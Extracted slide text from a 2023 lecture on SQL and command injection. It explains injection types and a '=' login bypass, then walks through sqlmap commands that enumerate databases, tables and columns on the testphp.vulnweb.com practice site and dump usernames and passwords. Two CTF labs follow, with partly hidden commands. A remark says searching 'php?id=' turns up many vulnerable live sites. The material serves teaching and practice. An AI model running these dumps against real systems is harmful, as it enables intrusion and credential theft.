SQL and Code Injections

Giorgi Akhalaia

Tbilisi, 2023
 Overview

• Intro to Web Security

• Injection Methods

• Relevance of SQL Injection Today

• Work with SQLmap

• Lab: small-data-leak

• Command Injections

• Lab: ping-station
 SQL Injection

• SQL injection attack exploits database vulnerabilities that are

associated with a web application. There are many types of SQL
injection attacks, such as in-band, error-based, union-based, blind,
boolean, time-based, and out-of-band attacks.

• SQL injection usually occurs when you ask a user for input, like their Koba or '='
username/userid, and instead of a name/id, the user gives you an SQL
statement that you will unknowingly run on your database.

• If the attacker can dynamically change SQL statements and execute

them on the backend, then the attacker can compromise the
confidentiality, integrity, and availability of information stored in the
database.
“Please compare the username given to the password in its
associated field. If this username matches this password, allow
access.” What we injected changed the original query to say,
“You can compare whatever you’d like, but ‘=‘ is a true
statement, so allow access please.”

For testing: http://testphp.vulnweb.com/

 SQL injections today

SQL injections are still valid today. Simply by searching for

parameters to attack can give as tons of vulnerable websites.

php?id=
 testphp.vulnweb.co
m

For this website we have no parameters in URL, so

we need to try another way of testing it’s security.

Very commonly, security problems are taking

place around the inputs (login, register, search
form etc).

Using special tools we can scan vulnerable URL’s

Once we perform the search, parameters are
displaying in URL In this case we can use sqlmap to get the
http://testphp.vulnweb.com/search.php?test=query information from vulnerable url
Getting databases
To check the URL we need to run sqlmap command:

$sqlmap -u http://testphp.vulnweb.com/search.php?test=query --dbs

URL What are we

looking for

Two databases were found

Getting the tables
Now we know the name of database and can work with the tables of this db

$sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart --tables

Database we Working on tables

already know inside this db
Getting the tables
When we know the name of the table, we can work on corresponding columns of this
table

$sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart -T users --columns

Already known
Working with the
information
columns
 Username and password
Getting information
$sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart -T users -C uname,pass --dump

Show me

Results:
 SQL Injection
(Structured Query Language)

Potential
outcomes
• Identity spoofing through manipulating databases to insert bogus or
misleading information

• Alteration of prices in e-commerce applications.

• Alteration of data or outright replacement of data in existing

databases with information created by the attacker

• Escalation of privileges to increase the level of access an attacker has

to the system.
 SQL Injection
(Structured Query Language)

Potential
outcomes
• Denial of service, performed by flooding the server with
requests designed to overwhelm the system

• Data extraction and disclosure of all data on the system

through the manipulation of the database

• Destruction or corruption of data through rewriting, altering,

or other means

• Eliminating or altering transactions that have been or will be

committed
 Laboratory: small-data-leak

Description:
I do not know what is wrong /user?id=.
It's not working at all. All I know is that
an attacker is asking us for a ransom...

Flag format: CTF{sha256}

Level: Medium

Server: 35.246.158.241:32442

Hints:
• Hint 1: sqlmap is your friend
 Laboratory: small-data-leak

Try to use hint from the description: /user?id=

Based on the error above, it was

concluded that SQLAlchemy is a python
library used for
interacting with SQL databases.

Since the SQL vulnerability seems

pretty basic, we will use SQLmap to
obtain the injection
point.
 Commands

$sqlmap -u http://35.246.158.241:31089/??????? --dbs

$sqlmap -u http://35.246.158.241:31089/??????? -D ???????????

$???????????????????
 Laboratory: ping-station

Description:
Just another ping service to audit.

Flag format: ECSC {sha256}

Level: Easy

Server: 35.246.134.224:31532

Hints:
• Hint 1: Regex
• Hint 2: Command injection
 Laboratory: ping-station

Try Only Command:

Gives the error:

 Laboratory: ping-station

Try yourself …

Result:
 Laboratory: ping-station

Try to read the content of ????????????

Result:
Thank you for Attention!

საკონტაქტო: email: [email protected]

mob: 598 590158